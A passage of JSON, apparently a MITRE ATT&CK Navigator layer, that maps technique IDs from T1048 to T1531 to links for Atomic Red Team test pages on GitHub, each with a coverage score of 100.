Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View 
